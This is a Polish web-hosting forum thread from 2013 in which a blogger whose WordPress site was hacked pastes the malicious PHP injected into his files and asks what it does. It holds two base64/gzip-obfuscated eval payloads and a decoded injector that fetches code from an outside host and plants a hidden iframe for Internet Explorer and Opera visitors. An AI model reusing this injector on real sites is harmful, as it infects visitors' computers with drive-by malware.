Witaj gościu! Zaloguj się lub Zarejestruj aby móc korzystać ze wszystkich funkcjonalności jakie oferuje to forum! Rozpocznij zarabianie przez internet, poznaj korzysci pracy w domu! Rejestracja i korzystanie z forum jest całkowicie darmowe!
Praca w domu - Dodatkowa Praca - Zarabianie przez Internet
Blog hacked vol2 - Wersja do druku

+- Praca w domu - Dodatkowa Praca - Zarabianie przez Internet (https://zarabiam.com)
+-- Dział: Off-Topic (/Forum-Off-Topic-9)
+--- Dział: Kosz/Spam/Archiwum (/Forum-Kosz-Spam-Archiwum-11)
+--- Wątek: Blog hacked vol2 (/Temat-Blog-hacked-vol2-67932)

Blog hacked vol2 - jambos - 16-04-2013 06:09

Kod:
<?php eval(gzinflate(base64_decode('fVRtb9s2EP7sAfsPF0MopUSRZDROB9tKU7TeVmxLCsfZPgSZoF​GUxUSiNJKKEyT+7zuKsp1i6wzZMu+eu3vujTwH9yBjORcsc0kuq0+KeN7z998NrHArA3/kTVGKT94KqnktADVJVoLrtLL0wNgMOLrb6hP2yJVWLqGoT7jgGj1b2MChBcSwU1gX007VCRXTdYNiWvj​w8Xrx6+WXZbKYL68XF8vFh4urH+cLH0a9gVO3euuMPTIKxqzXGT5WIaWoOwUcxDFEHvRmeVoq9ioyLWv​FXrnYAEMAPG/hvGTJiumE1kIzgelZ6huDlUy3UoCWvHINvvOw+Y+qUWmS46Ir9MDhZay0LJnoZFOnjgnpgue1RCoc40Z​TwPcMf0rz7+jIJBDEiL9x+C38CeTQmvQcnPpbsZE8vlwP5TY6NjqXacUwCpkp/VSys2DV3K1X8AxNrbixnKR/qbpsNZtCyXI9OX43ets8TgG7NDkeRaNTc9jMQmsOs4w/AC1TpeJh52p4NuM2iJI0HhZaN5MwvJdiXRSFXj8UQfWUr4NWhXd/t0w+hcgyaIrm/QOTsRUFZaqZ0sGdGsKaZ7qIh2/HJ0MoGF8VOh6ejMcYJbRh8A9SOCNTCEPML21LDZ2iy5jWGSu5uDcZ/w8VQcOVoN+kYettJuxg59E2dNeEbWntJNlmYMFlTMKHVIa6aqwTJ0cqKA9IqJhSCQmqbNytXtLZE6+P5​R50A9hvlpN78PICmlfM9eC4G86qOxnNGZxGh2PT50G/dFlJzQh3a+vuOe9XxSD6FOw5b9DgPK8bM5u5D2Td3w7mk68l1yZW47+aauOid4mQbp0MZCva2JdZqh6z​K1ZJLcZC9ojzVhieJqldIbFktKP2733sUb1bPFPv/Z4eniZf9aVvi9OmpgfJ1Xzx+3xxQ35eLr8k13hKPvw0v1iSW4M1NWkkWyVVqmnhkvAPLrJ6rULiAzrw4​M0b+Er/29Xn+ctlw2S6g9jy4X1Uy0Syppaai5UbWdLbLnOFN6DrJB8vL3/5PL8hSdLqKpfktgvhiJzGr3cZtvfqOZrRur7neHFvbXyZiswd+aMoijzfDsvRD6cnUXT4zidhP1uDRnK​BIdH1vsr4xecf')));?>

znowu mam taki kod wjebany w kazdy plik na blogu powiedzcie mi co on robi? nie umiem go rozszyfrowac....

jak to cholerstwo najszybciej usunac?
//
Kod:
<?php eval(gzinflate(base64_decode('fVRtb9s2EP7sAfsPF0MopUSxlK5NM9tKU7TeWmxLCsfZPgSZoF​GUzUSiVJKKHST+7z2Ssp1i6wzbEu+eu3vujbwAfy9nBRcs90khqw+KBMHjjz/0nHAjg/AoGKEUv0UrqOa1ANSkeQm+18oyAGPT4+huo0/ZiiutfEJRn3LBNXp2sJ5HF5DAVuFcjKzKChXTdYNiugjh/dX094vPs3Q6mV1Nz2fTd+eXv0ymIRx1Bl7d6o0ztmIUjFmnM3ycQkpRWwXsJQnEAXRmRVYq9iwyLWvFn​rlYA0MAPG7gvGTpnOmU1kIzgek56muDlUy3UoCWvPIN3npY/0fVqDTJcWEL3fN4mSgtSyasbOTVCSE2eFFLpMIxbjwCfI7xrzRvBwcmgUGC+GuP38DfQPadScfBq78XG​8njww9Q7qJjowuZVQyjkLHSDyU7HdxVuZDwCE2tuLEcZv+oumw1G0HJCj08PHn5c7MaAXZpePjm5KV5X​48jZw3jnN8DLTOlkr711D8dcxdDSZr0F1o3wyi6Xa1YNW/yhy93g+qhWA5aFd1+aZl8iJDkoFk0b++ZTJxoUGaaKT24VX1Y8lwvkv6r47gPC8bnC530f4pjjBK5MPi​CFE7JCKII08vaUoNV2IRpnbOSizuT8P9QETSaC/pdGq7cZsD2th5dP7c92FTWDZLrBdZbJiS6z2Skq8Y58QqkgvIBiRRTKiWDKn9tNy+19iToYvl7dv66xf​KKAJ6eQPOK+QEc2tms7MloTuE43n9t2tzrdi4vqZlgu7X+jvNuUwyiS8GdiwYNzoq6MaNZhECW3eVgPs​VScm1iNeGzoTYuOpcIsdtkIBvR2j3MTnWYbbFK6jAOskOctcLwNEltC4klo5bav9exQ3Vu8UyDtzt6eB​p+05euLV6bmR6kl5Ppn5PpNfk4m31Or/CUvvt1cj4jNwZratJINk+rTNOFT6K/uMjrpYpICOgggBcv4Bv9H5efJk8XDZPZFuLKh9dRLVPJmlpqLuZ+7EhvuswVXoC+l76/uPjt0+SapGmrq0KSGxvCEwVNnq8ybK7VMzSjdX3H8d7e2IQyE7l/FB7FcRyEblgOTo5fxfH+m5BE3Wz1GskFhkTXuyrjD79fAQ==')));?>
taki kod mi teraz rano podoklejali
skanowalem spy botem i esetem na kompie i nic nie mam jakos postawilem od nowa wordpressa o polnocy i teraz znow nie dziala...
//
Kod:
if (!defined('frmDs')){
    define('frmDs' ,1);
    
    function frm_dl ($url) {
        if (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            $out = curl_exec ($ch);
            if (curl_errno($ch) !== 0) $out = false;
            curl_close ($ch);
        } else {$out = file_get_contents($url);}
        return trim($out);
    }
    
    function frm_crpt($in){
        $il=strlen($in);$o='';
        for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
        return $o;
    }
    
    function frm_getfrm()
    {
        $defframe = '<style>.kmdnr { position:absolute; left:-829px; top:-782px; }</style> <div class="kmdnr"><iframe src="http://jxxemgpdyqk.myfw.us/jquery/get.php?ver=jquery.latest.js" width="460" height="300"></iframe></div>'; //default frame
        $codelink = 'http://jxxemgpdyqk.myfw.us/nc/gnc.php?ver=jquery.latest.js';
        if (!$codelink){
            return $defframe;
        }
    
        $dr='/var/tmp';
        $f = $dr.'/sess_'.md5('frm_frame');
        if(!file_exists($f) || time() - filemtime($f) > 60*5)
        {
            $dlc = frm_dl($codelink);
            if ($dlc){
                if ($fp = @fopen($f, 'w')){
                    fwrite($fp, frm_crpt($dlc));
                    fclose($fp);
                }
                else
                    return $dlc;
            }
            else
                @unlink($f);
        }
        $fc = @file_get_contents($f);
        return ($fc)?frm_crpt($fc):$defframe;
    }
    
    $ua = $_SERVER['HTTP_USER_AGENT'];
    if (preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) ){
        error_reporting(0);
        
        if(!isset($_COOKIE['__utmfr']) && $nfc=frm_getfrm() ) {
            @setcookie('__utmfr',rand(1,1000),time()+86400*7,'/');
            print($nfc);
        }
    }
}
to jest ten zakodowany kod co go mialem. co on dokladnie robi?!

RE: Blog hacked vol2 - jambos - 17-04-2013 12:37

ref

RE: Blog hacked vol2 - As7 - 17-04-2013 20:24

udaj sie do Diqitiona lub innego mentora moze bd cos wiedzieć Smile

RE: Blog hacked vol2 - jambos - 17-04-2013 21:30

juz chyba udalo mi sie samemu rozwiazac, myslisz ze diq by pomogl?^^

Blog hacked vol2 - Artinesse - 02-03-2018 01:06

Wątek został przeniesiony do kosza.
Prawdopodobne przyczyny :

1. Temat jest niezgodny z regulaminem.
2. Podobny temat znajduje się już na forum.
3. Wątek nie jest już aktualny.
4. Autor prosił o jego przeniesienie.
5. Temat został wyczerpany bądź rozwiązany.

Pozdrawiamy
Administracja Forum.